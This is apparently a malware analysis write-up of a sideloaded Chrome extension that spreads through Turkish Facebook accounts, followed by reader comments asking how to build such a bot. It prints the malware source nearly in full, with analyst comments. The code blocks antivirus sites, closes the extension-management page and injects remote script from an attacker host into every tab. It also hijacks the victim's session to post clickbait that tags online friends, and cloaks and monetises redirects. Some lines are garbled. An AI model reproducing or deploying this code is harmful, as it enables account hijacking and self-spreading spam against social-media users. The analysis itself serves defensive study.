videotr.in (Facebook-spreading browser extension, fronted by Cloudflare)

This campaign targets Turkish Facebook users. The scripts the extension loads at runtime are spread over several domains (likef.biz, upjs.net, jsup.us, videotr.in), so taking down any single host does not stop it.

The infection starts at hxxp://www.videotr.in, which plays a short video clip. Playback is then interrupted and the user is urged to run a downloaded .exe, presented as the fix for the playback problem.

The .exe fetches the extension's files from the list at hxxp://www.likef.biz/ask.txt, assembles them into a Chrome extension and sideloads it into Chrome (i.e. without going through the Web Store).

background.js

// Blocking webRequest listener: cancels any request whose URL contains one of the
// substrings in `ibneler`. Matching is a plain indexOf(), so a substring match
// anywhere in the URL (host, path or query) is enough to block the request.
// Registered for <all_urls> with the "blocking" option, i.e. it runs synchronously
// on every request the browser makes.
chrome.webRequest.onBeforeRequest.addListener(
        function (details) {
                var url = details.url;
                for (var i = 0; i < ibneler.length; i++) {
                        if (url.indexOf(ibneler[i]) > -1) {
                                return {
                                        cancel: true
                                };
                        }
                }
        }, {
                urls: ["<all_urls>"]
        }, ["blocking"]);
// The blocklist. `var` is hoisted and the listener only fires on later requests, so
// the reference above the declaration is not a bug. Seeded with Facebook's csp.php
// (presumably the CSP violation-report URI; blocking it would keep the injected
// script's CSP violations from reaching Facebook). Organik() below appends more
// entries fetched from a remote server at runtime.
var ibneler = [
        'https://www.facebook.com/csp.php'
];
// Fetches a JSON array of {uri: ...} objects from upjs.net over plain HTTP and appends
// every non-empty `uri` to the `ibneler` blocklist. The random `amtasak` query value
// is presumably a cache-buster. There is no HTTP status check — any response body
// is parsed — and parse/shape errors are swallowed, so a bad or empty response
// simply leaves the list unchanged.
function Organik() {
        var xhr = new XMLHttpRequest();
        xhr.onreadystatechange = function () {
                if (xhr.readyState == 4) {
                        try {
                                JSON.parse(xhr.responseText).forEach(
                                        function (d) {
                                                if (d.uri) {
                                                        ibneler.push(d.uri);
                                                }
                                        });
                        } catch (e) {}
                }
        };
        xhr.open("GET",
                'http://www.upjs.net/ajax/get.js?amtasak=' +
                Math.random() * 999999, true);
        xhr.send();
}
// Runs once at extension start-up; the list is not refreshed afterwards.
Organik();
// Anti-removal: closes any tab whose URL is exactly one of the extension-management
// pages (Chrome's old and current URL, and Opera's). The comparison is an exact
// string match, so variants such as 'chrome://extensions' without the trailing slash
// or with a query/fragment are not caught.
chrome.tabs.onUpdated.addListener(
        function (tabid, x, tab) {
                if (tab.url ==
                        'chrome://chrome/extensions' ||
                        tab.url == 'opera://extensions' ||
                        tab.url == 'chrome://extensions/'
                ) {
                        chrome.tabs.remove(tab.id);
                }
        });
// Payload loader. On every tab update it fetches user.php from jsup.us over plain
// HTTP and injects the raw response body as script into that tab (any tab whose URL
// does not contain 'devtools://'). There is no status check and no integrity check,
// so whoever controls jsup.us — or the network path, since it is HTTP — gets
// arbitrary code in every page the victim opens. The inner bare `{ ... }` block is
// redundant.
chrome.tabs.onUpdated.addListener(function (tabId) {
        chrome.tabs.get(tabId, function (tab) {
                {
                        var xhr = new XMLHttpRequest();
                        xhr.onreadystatechange = function () {
                                if (xhr.readyState == 4) {
                                        if (tab.url.indexOf('devtools://') < 0) {
                                                chrome.tabs.executeScript(tab.id, {
                                                        code: xhr.responseText
                                                });
                                        }
                                }
                        }
                        xhr.open('GET', 'http://www.jsup.us/user.php');
                        xhr.send();
                }
        })
});

Script.js

// Content script: unless the page already has an element with id "amung", fires a
// tracking pixel to whos.amung.us (a visitor counter) so the operator can count
// infected browsers. user.php repeats the same check with a different key.
if(!document.getElementById('amung')){
new Image().src = 'http://whos.amung.us/pingjs/?k=z8l4ub8fvjhz';
}

Background.js loads a list of URL substrings from hxxp://www.upjs.net/ajax/get.js and cancels any request whose URL contains one of them. The list (below) covers anti-virus vendors and VirusTotal/Jotti, Facebook's own malware-checkpoint and extension-logging endpoints (cr_ext_config, cr_ext_log), and file hosts such as Dropbox, Google Drive, S3 and Google Code; the built-in entry also blocks facebook.com/csp.php. Separately, it closes any tab that navigates to the Chrome or Opera extension-management page, so the victim cannot easily disable the extension.

get.js

[{"uri":"virustotal.com"},{"uri":"avast.com"},{"uri":"eset.com"},{"uri":"microsoft.com"},{"uri":"virusscan.jotti.org"},{"uri":"jotti.org"},{"uri":"avg.com"},{"uri":"kaspersky.com.tr"},{"uri":"kaspersky.com"},{"uri":"facebook.com/ajax/webstorage/process_keys.php"},{"uri":"facebook.com/checkpoint/malware/cr_ext_config"},{"uri":"facebook.com/checkpoint/malware/cr_ext_log"},{"uri":"sansurcrx.com"},{"uri":"dl.dropboxusercontent.com"},{"uri":"sosyalmedyakusu.com"},{"uri":"fiddle.jshell.net"},{"uri":"fei-coder.com"},{"uri":"docs.google.com"},{"uri":"drive.google.com"},{"uri":"orjinalmarket.net"},{"uri":"facebook.com/ajax/follow/unfollow_profile.php"},{"uri":"vuupc.com"},{"uri":"mcafee.com"},{"uri":"s3.amazonaws.com"},{"uri":"googlecode.com"}]
Kaspersky.com blocked

Background.js also fetches additional JavaScript from hxxp://www.jsup.us/user.php on every tab update and injects it into the tab with executeScript. Because this is plain HTTP with no integrity check, the operator (or anyone on the network path) can push arbitrary code into every page the victim opens. The script served at the time of analysis is the Facebook spreading component.

user.php

// Injected payload (served by jsup.us/user.php). Same whos.amung.us tracking pixel as
// Script.js, with its own key.
if (!document.getElementById("amung")) {
    new Image().src = "http://whos.amung.us/pingjs/?k=bcpn2gdh64no";
}
// `tarih` ("date") is reused at the bottom of the script as the rate-limit timestamp.
var tarih = new Date();
// `takip` ("follow"): two Facebook ids; not referenced anywhere in the visible code.
var takip = Array("1661944612", "1625224768");
// NOTE(review): this line is garbled in the listing (unbalanced parentheses, an
// assignment used as a loop condition). From the matching write at the end of the
// script it looks like a guard on the localStorage['Post_' + profile_id] timestamp
// — presumably "only post again once the stored time has passed" — but the original
// cannot be recovered from here. Also, `profile_id` is declared with `var` further
// down, so at this point it is still undefined.
for (i = 0; i = localStorage['Post_' + profile_id])) {
    // Returns n random characters from A-Z0-9; used to make each spam message unique.
    function rndchr(n) {
        var text = "";
        var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
        for (var i = 0; i < n; i++) text += possible.charAt(Math.floor(Math.random() * possible.length));
        return text;
    }
    // Pool of Turkish clickbait texts for the spam post (complaints about TV shows,
    // "watch my video" etc.). Backslashes were stripped in the listing: `u0130`,
    // `xFC` are presumably the escapes \u0130, \xFC, and the last string is broken
    // across two lines where the original had a line continuation or an escape.
    var u = ["Canli yayinda giyilecek elbisemi Allah askina bu! " + rndchr(1) + " ", " is gercekten iyice cigrindan cikti ne olacak boyle bilmiyorum!" + rndchr(1) + " ", "Bunlar da hakli hic bir yetenegi olmayan insanlar sonucta bunlar!" + rndchr(1) + " ", " Bunlari kontrol eden kurum RTUK! gor artik bunlar ve bi cozum uret!" + rndchr(1) + " ", "Valla bunlarda kisilik falan kalmamis kardesim" + rndchr(1) + " ", "Kardesim coluk cocugumuz var bunlar iyice bozdu!" + rndchr(1) + " ", "Birakin artik bu isleri bizler akillandik yemiyoruz bu numaralari!" + rndchr(1) + " ", "Ben izledim kendimden utandim. sizde bir bakin sunlara" + rndchr(1) + " ", "Yeter biktik beee! Biz boyle izlemek istemiyoruz!" + rndchr(1) + " ", "Yaa arkadaslar bunlari kontrol eden bir kurum yokmu! " + rndchr(1) + " ", "Reyting ugruna her gun neler goruyoruz vallahi yazik!" + rndchr(1) + " ", "Bizim orf adetlerimizle hic bagdasmayan seyler bunlar!" + rndchr(1) + " ", "DxFCn'den Beri Ugrau015Ftu0131gu0131m tek u015Eey bu Video u0130zleyin.", "Mutlaka u0130zleyin gxFCnlerdir ugrau015Fu0131orum.", "Videomu u0130zleyen Herkeze Teu015FekkxFCrler.", "En Sevdiğim Arkadaşlarım :)", "Ben Bu Videoyu yapmak ixE7in gxFCnlerimi verdim kimse izlemior.", "Yeni yılınız kutlu olsun arkadaşlar :) :D", "2013 yu0131lu0131nda arkadau015Flaru0131m ile gexE7irdiu011Fim en gxFCzel anlar", "Benim videomu birtek noal baba izlesin dilek diledim", "Simdide İnanmayinda Goreyim :)", "Herkez Cesaret Edemez ..", "İste Size Bahsettigim Sirrim :)", "Cok Utaniyorum Ama Birde Siz u0130zleyin LxFCtfen", "Ne Kadar Cilgin Bir İnsanim Ben.", "Nasilda Tatliyim Ama..", "Dostlarimin Destegi Olmasaydi Gidemezdim..", "Destek Veren Tum Dostlarimi Kutluyorum", "Yetenek Sizsiniz TxFCrkiye'ye Katu0131ldu0131m. 
u0130zlerseniz Sevinirim", "Bunu Yapacagım Aklima Gelmezdi :)", "Destek Veren TxFCm Arkadaslarima TesekkxFCr Ederim", "Sonunda Bunuda Yaptim ya Helal Olsun Bana", "Kim Derdiki Televizyona Cikacagım ?", "Taniyanlar Ne Kadar Cilgin Oldugumu Bilir :)"];
    // One text is picked per run; it becomes the post's message.
    var rand = u[Math.floor(u.length * Math.random())];
    // Victim's Facebook user id, taken from the `c_user` cookie. The regex lost its
    // backslash in the listing (presumably /c_user=(\d+)/). The outer match() is
    // redundant: it re-matches the captured digits and toString() yields the same id.
    var profile_id = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]).toString();

    // rastgele ("random"): returns `uzunluk` random alphanumeric characters; used to
    // append a throw-away query string to the spread link. `mtn`, `ret` and `i` are
    // assigned without `var`, so they are implicit globals (`i` clobbers the outer
    // loop index). The alphabet has 58 characters but the multiplier is 57, so the
    // last character ('9') is never selected.
    function rastgele(uzunluk) {
        mtn = "ABCDEFGHIJKLMNOPRSTUVYZXabcdefghijklmnoprstuvyzx0123456789";
        ret = "";
        for (i = 0; i < uzunluk; i++) {
            ret += mtn[Math.floor(Math.random() * 57)];
        }
        return ret;
    }
    // Fetch the current spread link from videotr.in over plain HTTP. The response
    // body is used verbatim (no status or format check) with a 250-character random
    // query string appended — presumably so every post carries a URL Facebook has
    // not seen before. Once the link is in hand the posting chain starts: topla() ->
    // online() -> paylas().
    var link = "";
    var xhr = new XMLHttpRequest();
    xhr.open("GET", 'http://www.videotr.in/dropbox/up.php', true);
    xhr.onreadystatechange = function () {
        if (xhr.readyState == 4) {
            link = xhr.responseText + "?" + rastgele(250);
            topla();
        }
    }
    xhr.send();

    // topla ("collect"): looks up the victim's display name via the public Graph API
    // (https://graph.facebook.com/<id>, `name` field) and passes it to online(). No
    // status check; a non-JSON body would throw inside the handler and stop the chain.
    function topla() {
        var get = new XMLHttpRequest();
        get.onreadystatechange = function () {
            if (get.readyState == 4) {
                var response = JSON.parse(get.responseText);
                var isim = response.name;
                online(isim);
            }
        };
        get.open("GET", "https://graph.facebook.com/" + profile_id, true);
        get.send();
    }
    // Implicit global; filled by online() with the ids of currently-online friends.
    friends = [];

    // online(): posts to Facebook's internal buddy_list endpoint from inside the
    // victim's session. The CSRF token is read from the page's `fb_dtsg` input, so
    // the request passes Facebook's CSRF check. The "for (;;);" prefix (Facebook's
    // JSON-hijacking guard) is stripped before parsing, and every key of
    // payload.buddy_list.nowAvailableList — i.e. each online friend's id — is pushed
    // onto `friends`. Any error is swallowed and paylas() is called regardless, so a
    // failed lookup still results in a post (with nobody tagged). `toplam` is unused.
    // The POST is sent without a Content-Type header.
    function online(isim) {
        var get = new XMLHttpRequest();
        get.onreadystatechange = function () {
            if (get.readyState == 4) {
                try {
                    var veri = JSON.parse(get.responseText.replace("for (;;);", ""));
                    var toplam = Object.keys(veri.payload.buddy_list.nowAvailableList).length;
                    for (kisi in veri.payload.buddy_list.nowAvailableList) {
                        friends.push({
                            id: kisi
                        });
                    }
                } catch (close) {}
                paylas(isim, friends)
            }
        };
        var params = "user=" + profile_id + "&fetch_mobile=false&__user=" + profile_id + "&__a=1&__req=2&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
        get.open("POST", "/ajax/chat/buddy_list.php?__a=1", true);
        get.send(params);
    }

    // paylas ("share"): the spreading step. Replays Facebook's composer request
    // (/ajax/profile/composer.php) from inside the victim's session to publish a
    // post on the victim's own timeline that carries the spread link as a link
    // attachment, the random message text, the victim's name in the attachment
    // title, and up to 150 online friends tagged via composertags_with[] so the post
    // lands in their feeds. The attachment metadata claims youtube.com as the link's
    // domain/summary, presumably to make the preview look like a YouTube video.
    // The response is ignored. Notes on the visible code:
    //  - the guard `link != "undefined" || link != ""` is always true (an OR of two
    //    inequalities), so the post is attempted even when up.php returned nothing;
    //  - the `clp=` line is garbled in the listing (inner quotes lost their escapes);
    //  - tag limit: fewer than 200 friends -> all of them, otherwise 150, so a victim
    //    with 150–199 online friends gets more tags than one with 200+.
    //  - audience[0][value]=80 is presumably the audience selector; its meaning is
    //    not determinable from here.
    function paylas(isim, friends) {
        if (link != "undefined" || link != "") {
            var http = new XMLHttpRequest();
            http.onreadystatechange = function () {
                if (http.readyState == 4) {}
            };
            var params = "";
            // CSRF token scraped from the page, same as in online().
            params = "fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
            params += "&xhpc_context=home";
            params += "&xhpc_ismeta=1";
            params += "&xhpc_timeline=";
            params += "&xhpc_composerid=u_jsonp_3_3";
            params += "&xhpc_litestand=1";
            params += "&xhpc_targetid=" + profile_id;
            params += "&clp={"cl_impid":"a4eb8ac2","clearcounter":0,"elementid":"u_jsonp_3_g","version":"x","parent_fbid":" + profile_id + "}";
            params += "&xhpc_message_text=" + rand;
            params += "&xhpc_message=" + rand;
            params += "&aktion=post";
            params += "&app_id=2309869772";
            // Link attachment: all three URL fields point at the fetched spread link.
            params += "&attachment[params][urlInfo][canonical]=" + link;
            params += "&attachment[params][urlInfo][final]=" + link;
            params += "&attachment[params][urlInfo][user]=" + link;
            params += "&attachment[params][title]=" + isim + " :Yazıklar olsun izlerken içim gitti ya.";
            params += "&attachment[params][summary]=www.youtube.com";
            params += "&attachment[params][images][0]=https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-prn1/1525624_180057068859680_248847473_n.jpg";
            params += "&w=100";
            params += "&h=100";
            params += "&url=https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-prn1/1525624_180057068859680_248847473_n.jpg";
            params += "&cfs=1";
            params += "&upscale";
            params += "&attachment[params][medium]=106";
            params += "&attachment[params][url]=" + link;
            params += "&attachment[type]=100";
            params += "&link_metrics[source]=ShareStageExternal";
            params += "&link_metrics[domain]=youtube.com";
            params += "&link_metrics[base_domain]=youtube.com";
            params += "&link_metrics[title_len]=51";
            params += "&link_metrics[summary_len]=260";
            params += "&link_metrics[min_dimensions][0]=70";
            params += "&link_metrics[min_dimensions][1]=70";
            params += "&link_metrics[images_with_dimensions]=1";
            params += "&link_metrics[images_pending]=0";
            params += "&link_metrics[images_fetched]=0";
            params += "&link_metrics[image_dimensions][0]=325";
            params += "&link_metrics[image_dimensions][1]=325";
            params += "&link_metrics[images_selected]=1";
            params += "&link_metrics[images_considered]=1";
            params += "&link_metrics[images_cap]=10";
            params += "&link_metrics[images_type]=images_array";
            params += "&composer_metrics[best_image_w]=100";
            params += "&composer_metrics[best_image_h]=100";
            params += "&composer_metrics[image_selected]=0";
            params += "&composer_metrics[images_provided]=1";
            params += "&composer_metrics[images_loaded]=1";
            params += "&composer_metrics[images_shown]=1";
            params += "&composer_metrics[load_duration]=16";
            params += "&composer_metrics[timed_out]=0";
            params += "&composer_metrics[sort_order]=";
            params += "&composer_metrics[selector_type]=UIThumbPager_6";
            // Tag online friends so the post appears on their timelines/notifications.
            if (friends.length < 200) {
                limit = friends.length;
            } else {
                limit = 150;
            }
            for (i = 0; i < limit; i++) {
                params += '&composertags_with[' + i + ']=' + friends[i].id;
            }
            params += "&is_explicit_place=";
            params += "&composertags_place=";
            params += "&composertags_place_name=";
            params += "&tagger_session_id=1388007674";
            params += "&action_type_id[0]=";
            params += "&object_str[0]=";
            params += "&object_id[0]=";
            params += "&hide_object_attachment=0";
            params += "&og_suggestion_mechanism=";
            params += "&composertags_city=";
            params += "&disable_location_sharing=false";
            params += "&composer_predicted_city=114515998560505";
            params += "&audience[0][value]=80";
            params += "&nctr[_mod]=pagelet_composer";
            params += "&__user=" + profile_id;
            params += "&__a=1";
            params += "&__dyn=7n8a9EAMBlClUlgDxqiykUUxoshEK49oKiWFamiFo";
            params += "&__req=17";
            params += "&__rev=1058441";
            params += "&ttstamp=";
            http.open("POST", "/ajax/profile/composer.php", true);
            http.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
            http.send(params);
        }
    }
    // Rate-limit marker, only set in Chrome: stores "now + 100 s" (1000 * 10 * 10 ms)
    // under Post_<profile_id> in localStorage. This is the value the garbled guard at
    // the top of the script appears to read, so presumably the victim is made to post
    // at most once every ~100 seconds.
    if (navigator.userAgent.indexOf("Chrome") > 0) {
        tarih.setTime(tarih.getTime() + 1000 * 10 * 10);
        localStorage['Post_' + profile_id] = tarih.getTime();
    }
}

The link to spread is fetched at runtime from hxxp://www.videotr.in/dropbox/up.php, and user.php appends a 250-character random query string to it (presumably to defeat Facebook's URL-based caching or blocking), so the operator can rotate the landing page without touching the extension.

The shortened URL returned by up.php leads to a page hosted on Dropbox, reproduced below; it contains nothing but a user-agent-based redirect.

    

    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
    <head>
            <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
            <title></title>
    </head>
    <body>
    <script type="text/javascript">
    // Dropbox-hosted landing page: a user-agent sniff written through string
    // indirection (a[b][c](...) is navigator.userAgent.indexOf(...)), which reads as
    // light obfuscation. `f`, `g`, `h`, `i` are never used — presumably leftovers from
    // a generic mobile-redirect snippet this was copied from.
    var a = navigator,
            b = "userAgent",
            c = "indexOf",
            f = "&m=1",
            g = "(^|&)m=",
            h = "?",
            i = "?m=1";
    // Mobile WebKit (but not iPad), Opera Mini and IE Mobile go to the goo.gl short
    // link; everything else is sent back to videotr.in to restart the infection.
    // Note the operator precedence: the iPad exclusion only applies to the first
    // clause, because && binds tighter than ||.
    if (-1 != a[b][c]("Mobile") && -1 != a[b][c]("WebKit") && -1 == a[b][c]("iPad") || -1 != a[b][c]("Opera Mini") || -1 != a[b][c]("IEMobile")) {
    top.location="http://goo.gl/wXXcpZ";
    }else{
    top.location = "http://www.videotr.in";
    }
    </script>
    </body>
    </html>


Mobile browsers are redirected (via the goo.gl short link) to hxxp://mobiltrafikmt.s3.amazonaws.com/mobil.html, where they are monetised through affiliate redirects; all other browsers are sent back to videotr.in so the infection cycle starts again.

mobil.html

<script src="http://code.jquery.com/jquery-latest.js" type="text/javascript"><!--mce:2--></script>
<script>
// Returns "Android" or "iPhone" from the user agent; any other device yields
// undefined, which the caller treats as the generic "web" bucket.
function detectmob() { 
 if( navigator.userAgent.match(/Android/i)){
    return "Android";
  }
  if( navigator.userAgent.match(/iPhone/i)){
    return "iPhone";
  }
}

// Traffic distribution: geolocates the visitor with ipinfo.io (JSONP), then routes
// Turkish visitors by mobile carrier (matched on the `org` string) and everyone else
// by phone OS, each to a separate affiliate landing page. Note `indexOf(...) > 0`
// rather than `>= 0`/`!== -1`: an `org` value that *starts* with the carrier name
// (index 0) would miss the carrier branch and fall through to the Wi-Fi/web pages.
$.get("http://ipinfo.io", function(response) {
    if(response.country=="TR")
    {
    // Turkey (original comment "TÜRKİYE", mojibaked in the listing)
    if(response.org.indexOf("TURKCELL")>0){
    top.location.href = 'turkcell.html';
    }else if(response.org.indexOf("Vodafone")>0){
    top.location.href = 'vodofone.html';
    }else if(response.org.indexOf("AVEA")>0){
    top.location.href = 'avea.html';
    }else{
    if(detectmob()=="Android"){
    top.location.href = 'androidwifi.html';
    }else if(detectmob()=="iPhone"){
    top.location.href = 'iphonewifi.html';
    }else{
    top.location.href = 'trweb.html';
    }
    }
    }else{
    // Abroad (original comment "YURTDIŞI", mojibaked in the listing)
    if(detectmob()=="Android"){
    top.location.href = 'yurtdisi-anroid.html';
    }else if(detectmob()=="iPhone"){
    top.location.href = 'yurtdisi-ios.html';
    }else{
    top.location.href = 'yurtdisiweb.html';
    }
    }
}, "jsonp");
</script>

Mobile visitors are bucketed by country (via ipinfo.io), Turkish mobile carrier and phone OS, then pushed through a network of affiliate links.



Hendrac7 - April 19, 2014 at 5:50 pm

videotr.in is non aktif bro , can you explain again to make BOT like this ??? my email : hendrac7@gmail.com

Kodran Piraj - June 10, 2014 at 2:22 pm

how to convert crx to exe please ?

Anonymous - July 24, 2014 at 11:42 pm

what info does hxxp://www.videotr.in/dropbox/up.php contain? Does it serve a json file?
